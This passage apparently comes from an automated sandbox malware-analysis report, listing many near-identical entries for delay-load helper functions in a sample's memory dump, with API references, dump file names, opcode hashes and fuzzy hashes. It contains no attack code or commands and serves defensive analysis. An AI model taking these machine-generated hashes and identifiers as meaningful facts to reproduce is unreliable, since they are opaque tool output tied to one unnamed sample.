                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 3fc2ec112b45b8df2d6aeeccb91f778bb540f2ed1c53e91dd89975671a64c37a
                                                                              • Instruction ID: 27330c3f52ff0824f822642053f1ff33ad4f9bed7225a64d52afde3c5bbb0dd1
                                                                              • Opcode Fuzzy Hash: 3fc2ec112b45b8df2d6aeeccb91f778bb540f2ed1c53e91dd89975671a64c37a
                                                                              • Instruction Fuzzy Hash: 23A001AA3AAA86FC71187253AD0AC3F022CE4C5F653B0992EF54294081A89059861535
                                                                              Function 00DE1B69 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: eb141c451a873a643924bbe175b13d78b56a34fc717dfca2903d153e1c5f2da1
                                                                              • Instruction ID: 27330c3f52ff0824f822642053f1ff33ad4f9bed7225a64d52afde3c5bbb0dd1
                                                                              • Opcode Fuzzy Hash: eb141c451a873a643924bbe175b13d78b56a34fc717dfca2903d153e1c5f2da1
                                                                              • Instruction Fuzzy Hash: 23A001AA3AAA86FC71187253AD0AC3F022CE4C5F653B0992EF54294081A89059861535
                                                                              Function 00DE1CEF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1CFC
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 6bddff14d03366040493faa2c4959a6b0afd25c72c34148d11ccbf6a6a0c1702
                                                                              • Instruction ID: 3b4040a4719b5c637c962c60d4cc3de780787b4278ecd06764b051b867caca54
                                                                              • Opcode Fuzzy Hash: 6bddff14d03366040493faa2c4959a6b0afd25c72c34148d11ccbf6a6a0c1702
                                                                              • Instruction Fuzzy Hash: 05A001AA3AA696BC71187252AE0ACBB526DD4C4F253B0951EF951E4081A89059851435
                                                                              Function 00DE1D46 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1CFC
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: d205e7f94247880df85b90114aeb580dd2394d91f1466e41a6e287727a212d44
                                                                              • Instruction ID: 60ff0f57789a92ac96584bf591c5f11df4174445d91b3d2f91b20560635b1da9
                                                                              • Opcode Fuzzy Hash: d205e7f94247880df85b90114aeb580dd2394d91f1466e41a6e287727a212d44
                                                                              • Instruction Fuzzy Hash: B1A001AA3AA696FC71187252AD0ACBB525DD4C8F613B0991EF942D4081A89059851435
                                                                              Function 00DE1D1E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1CFC
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 3f95c2dba85b569dc0d592c36f621a7bdd64fe1b9c37ad8de0e3145303097665
                                                                              • Instruction ID: 60ff0f57789a92ac96584bf591c5f11df4174445d91b3d2f91b20560635b1da9
                                                                              • Opcode Fuzzy Hash: 3f95c2dba85b569dc0d592c36f621a7bdd64fe1b9c37ad8de0e3145303097665
                                                                              • Instruction Fuzzy Hash: B1A001AA3AA696FC71187252AD0ACBB525DD4C8F613B0991EF942D4081A89059851435
                                                                              Function 00DE1D14 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1CFC
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 9061a3569c4c0bbb29ea4fb480e966ac0099c3c2a40058fbc26ce4f2b5332046
                                                                              • Instruction ID: 60ff0f57789a92ac96584bf591c5f11df4174445d91b3d2f91b20560635b1da9
                                                                              • Opcode Fuzzy Hash: 9061a3569c4c0bbb29ea4fb480e966ac0099c3c2a40058fbc26ce4f2b5332046
                                                                              • Instruction Fuzzy Hash: B1A001AA3AA696FC71187252AD0ACBB525DD4C8F613B0991EF942D4081A89059851435
                                                                              Function 00DE1D0A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1CFC
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 43c48daef9748dc61ecfa0bd1702ecf141abbd656e6911c0126221173fd78e19
                                                                              • Instruction ID: 60ff0f57789a92ac96584bf591c5f11df4174445d91b3d2f91b20560635b1da9
                                                                              • Opcode Fuzzy Hash: 43c48daef9748dc61ecfa0bd1702ecf141abbd656e6911c0126221173fd78e19
                                                                              • Instruction Fuzzy Hash: B1A001AA3AA696FC71187252AD0ACBB525DD4C8F613B0991EF942D4081A89059851435
                                                                              Function 00DE1D32 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1CFC
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: a9517726cbfb66b1c7e81626474e160ad181f930eb7849e4dc121cce0fd81fdb
                                                                              • Instruction ID: 60ff0f57789a92ac96584bf591c5f11df4174445d91b3d2f91b20560635b1da9
                                                                              • Opcode Fuzzy Hash: a9517726cbfb66b1c7e81626474e160ad181f930eb7849e4dc121cce0fd81fdb
                                                                              • Instruction Fuzzy Hash: B1A001AA3AA696FC71187252AD0ACBB525DD4C8F613B0991EF942D4081A89059851435
                                                                              Function 00DE1D28 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1CFC
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: a33b139527e1a7c66f25576304481581595a94b6c3c3c3d54f3bcfc1180f0e12
                                                                              • Instruction ID: 60ff0f57789a92ac96584bf591c5f11df4174445d91b3d2f91b20560635b1da9
                                                                              • Opcode Fuzzy Hash: a33b139527e1a7c66f25576304481581595a94b6c3c3c3d54f3bcfc1180f0e12
                                                                              • Instruction Fuzzy Hash: B1A001AA3AA696FC71187252AD0ACBB525DD4C8F613B0991EF942D4081A89059851435
                                                                              Function 00DE1E58 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E22
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 02f472a94bbc63e09271050a20a33b9bcc6091145fb7266b7aeb4ce85d1a9261
                                                                              • Instruction ID: 4f4fc834aae7fb0c646d3c987fea548fe8241a9e87e22a75ddf05530f6528f15
                                                                              • Opcode Fuzzy Hash: 02f472a94bbc63e09271050a20a33b9bcc6091145fb7266b7aeb4ce85d1a9261
                                                                              • Instruction Fuzzy Hash: 36A011AA3A8282BC30083202AC0AC3B020CC0C0F203B0880EF802A0082A88008800030
                                                                              Function 00DE1E4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E22
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 4a4d4fdd44c1f6cdc7c563a8a7544fb23c11bb304c278179e1d1bf10e0790e36
                                                                              • Instruction ID: 4f4fc834aae7fb0c646d3c987fea548fe8241a9e87e22a75ddf05530f6528f15
                                                                              • Opcode Fuzzy Hash: 4a4d4fdd44c1f6cdc7c563a8a7544fb23c11bb304c278179e1d1bf10e0790e36
                                                                              • Instruction Fuzzy Hash: 36A011AA3A8282BC30083202AC0AC3B020CC0C0F203B0880EF802A0082A88008800030
                                                                              Function 00DE1E44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E22
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 67b0df573138adfafcbd3aa8fcceec8476b3c5bab5cc2b07dd403bc9aa9385b2
                                                                              • Instruction ID: 4f4fc834aae7fb0c646d3c987fea548fe8241a9e87e22a75ddf05530f6528f15
                                                                              • Opcode Fuzzy Hash: 67b0df573138adfafcbd3aa8fcceec8476b3c5bab5cc2b07dd403bc9aa9385b2
                                                                              • Instruction Fuzzy Hash: 36A011AA3A8282BC30083202AC0AC3B020CC0C0F203B0880EF802A0082A88008800030
                                                                              Function 00DE1E6C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E22
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: b038877470ce5a7286840128ffcbfdfe3191b5e758de5a07ee92c8c1ec798a5c
                                                                              • Instruction ID: 4f4fc834aae7fb0c646d3c987fea548fe8241a9e87e22a75ddf05530f6528f15
                                                                              • Opcode Fuzzy Hash: b038877470ce5a7286840128ffcbfdfe3191b5e758de5a07ee92c8c1ec798a5c
                                                                              • Instruction Fuzzy Hash: 36A011AA3A8282BC30083202AC0AC3B020CC0C0F203B0880EF802A0082A88008800030
                                                                              Function 00DE1E62 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E22
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 263a164d8bc52121684aea23fae985d76028fbd2dd04cb31a0e30fa969722b17
                                                                              • Instruction ID: 4f4fc834aae7fb0c646d3c987fea548fe8241a9e87e22a75ddf05530f6528f15
                                                                              • Opcode Fuzzy Hash: 263a164d8bc52121684aea23fae985d76028fbd2dd04cb31a0e30fa969722b17
                                                                              • Instruction Fuzzy Hash: 36A011AA3A8282BC30083202AC0AC3B020CC0C0F203B0880EF802A0082A88008800030
                                                                              Function 00DE1E3A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E22
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: e61e3966fa595584e3ed47a004a55c560983968227fec55f1b1d773ccd229b95
                                                                              • Instruction ID: 4f4fc834aae7fb0c646d3c987fea548fe8241a9e87e22a75ddf05530f6528f15
                                                                              • Opcode Fuzzy Hash: e61e3966fa595584e3ed47a004a55c560983968227fec55f1b1d773ccd229b95
                                                                              • Instruction Fuzzy Hash: 36A011AA3A8282BC30083202AC0AC3B020CC0C0F203B0880EF802A0082A88008800030
                                                                              Function 00DE1D55 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1D5D
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
